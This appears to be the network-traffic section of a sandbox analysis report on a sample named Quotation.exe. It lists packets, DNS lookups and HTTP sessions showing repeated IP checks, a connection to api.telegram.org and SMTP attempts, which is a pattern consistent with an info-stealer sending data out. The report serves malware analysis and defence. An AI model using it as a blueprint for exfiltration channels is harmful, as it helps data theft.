Oct 7, 2024 10:13:32.112138033 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.112229109 CEST	49708	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:32.112468004 CEST	49708	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:32.112487078 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.154035091 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.575525999 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.577111006 CEST	49708	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:32.577137947 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.712269068 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.712348938 CEST	443	49708	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:32.712399960 CEST	49708	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:32.713049889 CEST	49708	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:32.719233990 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.720226049 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.724452019 CEST	80	49707	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:32.724734068 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.725002050 CEST	80	49709	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:32.725079060 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.725152969 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:32.730243921 CEST	80	49709	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:33.399947882 CEST	80	49709	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:33.401659966 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:33.401702881 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:33.401774883 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:33.402044058 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:33.402059078 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:33.450514078 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:33.896085978 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:33.898040056 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:33.898061037 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:34.085563898 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:34.085665941 CEST	443	49710	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:34.085724115 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:34.086285114 CEST	49710	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:34.089541912 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:34.090641975 CEST	49711	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:34.094995022 CEST	80	49709	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:34.095093012 CEST	49709	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:34.095684052 CEST	80	49711	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:34.095767021 CEST	49711	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:34.095885992 CEST	49711	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:34.100770950 CEST	80	49711	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:34.779483080 CEST	80	49711	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:34.780838013 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:34.780889034 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:34.781092882 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:34.781335115 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:34.781349897 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:34.825501919 CEST	49711	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:35.260404110 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:35.262412071 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:35.262440920 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:35.384670019 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:35.384780884 CEST	443	49712	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:35.384848118 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:35.385340929 CEST	49712	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:35.390044928 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:35.394839048 CEST	80	49713	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:35.395085096 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:35.395085096 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:35.399943113 CEST	80	49713	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:36.067461014 CEST	80	49713	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:36.069104910 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.069144011 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.069231033 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.069561958 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.069578886 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.106731892 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.527308941 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.529186964 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.529211044 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.696413994 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.696532965 CEST	443	49714	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:36.696616888 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.697319984 CEST	49714	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:36.702967882 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.704159021 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.708319902 CEST	80	49713	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:36.708393097 CEST	49713	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.709013939 CEST	80	49715	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:36.709081888 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.709188938 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:36.714013100 CEST	80	49715	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:37.375009060 CEST	80	49715	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:37.376739979 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:37.376795053 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:37.376874924 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:37.377152920 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:37.377175093 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:37.419272900 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:37.840362072 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:37.842080116 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:37.842103004 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:38.004780054 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:38.005055904 CEST	443	49716	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:38.005136967 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:38.005530119 CEST	49716	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:38.008801937 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:38.010004044 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:38.014106989 CEST	80	49715	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:38.014179945 CEST	49715	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:38.014777899 CEST	80	49717	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:38.014857054 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:38.014936924 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:38.019670010 CEST	80	49717	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:38.680730104 CEST	80	49717	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:38.682071924 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:38.682113886 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:38.682208061 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:38.682471991 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:38.682486057 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:38.731796026 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.157183886 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:39.159159899 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.159193993 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:39.309822083 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:39.309942961 CEST	443	49718	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:39.309999943 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.310429096 CEST	49718	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.313219070 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.314429998 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.318491936 CEST	80	49717	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:39.318573952 CEST	49717	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.319222927 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:39.319302082 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.319396973 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:39.324323893 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:39.987910032 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:39.989347935 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.989408016 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:39.989567041 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.989731073 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:39.989744902 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:40.031431913 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:40.458430052 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:40.460067987 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:40.460103989 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:40.602828026 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:40.603077888 CEST	443	49720	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:40.603153944 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:40.603466988 CEST	49720	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:40.617280006 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:40.622608900 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:40.622685909 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:40.624829054 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:40.624876022 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:40.624943972 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:40.625350952 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:40.625368118 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.238488913 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.238648891 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:41.302210093 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:41.302246094 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.303178072 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.304703951 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:41.351394892 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.480448008 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.480618000 CEST	443	49721	149.154.167.220	192.168.2.8
Oct 7, 2024 10:13:41.480724096 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:41.484734058 CEST	49721	443	192.168.2.8	149.154.167.220
Oct 7, 2024 10:13:47.768167019 CEST	49711	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:48.076371908 CEST	49727	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:13:49.091130018 CEST	49727	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:13:51.091090918 CEST	49727	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:13:55.106795073 CEST	49727	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:03.122343063 CEST	49727	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:10.641695023 CEST	49728	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:11.653695107 CEST	49728	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:13.669241905 CEST	49728	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:17.669204950 CEST	49728	25	192.168.2.8	192.250.231.25
Oct 7, 2024 10:14:25.669231892 CEST	49728	25	192.168.2.8	192.250.231.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 10:13:27.996126890 CEST	55828	53	192.168.2.8	1.1.1.1
Oct 7, 2024 10:13:28.003911018 CEST	53	55828	1.1.1.1	192.168.2.8
Oct 7, 2024 10:13:29.778098106 CEST	53840	53	192.168.2.8	1.1.1.1
Oct 7, 2024 10:13:29.786932945 CEST	53	53840	1.1.1.1	192.168.2.8
Oct 7, 2024 10:13:40.617278099 CEST	49351	53	192.168.2.8	1.1.1.1
Oct 7, 2024 10:13:40.624269962 CEST	53	49351	1.1.1.1	192.168.2.8
Oct 7, 2024 10:13:48.053837061 CEST	50871	53	192.168.2.8	1.1.1.1
Oct 7, 2024 10:13:48.075033903 CEST	53	50871	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 10:13:27.996126890 CEST	192.168.2.8	1.1.1.1	0x8478	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:29.778098106 CEST	192.168.2.8	1.1.1.1	0xeaa0	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:40.617278099 CEST	192.168.2.8	1.1.1.1	0x5ce4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:48.053837061 CEST	192.168.2.8	1.1.1.1	0xc65b	Standard query (0)	mail.electradubai.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:28.003911018 CEST	1.1.1.1	192.168.2.8	0x8478	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:29.786932945 CEST	1.1.1.1	192.168.2.8	0xeaa0	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:29.786932945 CEST	1.1.1.1	192.168.2.8	0xeaa0	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:40.624269962 CEST	1.1.1.1	192.168.2.8	0x5ce4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 7, 2024 10:13:48.075033903 CEST	1.1.1.1	192.168.2.8	0xc65b	No error (0)	mail.electradubai.com		192.250.231.25	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:28.015691996 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 10:13:28.708383083 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f2c9b4598b5c61269776b01f117db3f9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 10:13:28.796660900 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 10:13:29.041935921 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: de650f9731f909e99e136495b876776b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 10:13:30.623306036 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 10:13:30.833537102 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 70545a99b98f5c129ef6835c33ffd35f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:31.443406105 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 10:13:32.110574007 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d7f2a3eba2554cb6d8a11e4d744e0079 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:32.725152969 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 10:13:33.399947882 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 857176a3d3ed1a19bfcbc26c10abbb70 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:34.095885992 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 7, 2024 10:13:34.779483080 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 615fb9d78e586ad2dd9ebe8fe1d7fc98 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:35.395085096 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 10:13:36.067461014 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 17d14fa021ac51b1dad1668552bf9db7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:36.709188938 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 10:13:37.375009060 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4a678f2a2196b38833fdcc4929505daf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49717	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:38.014936924 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
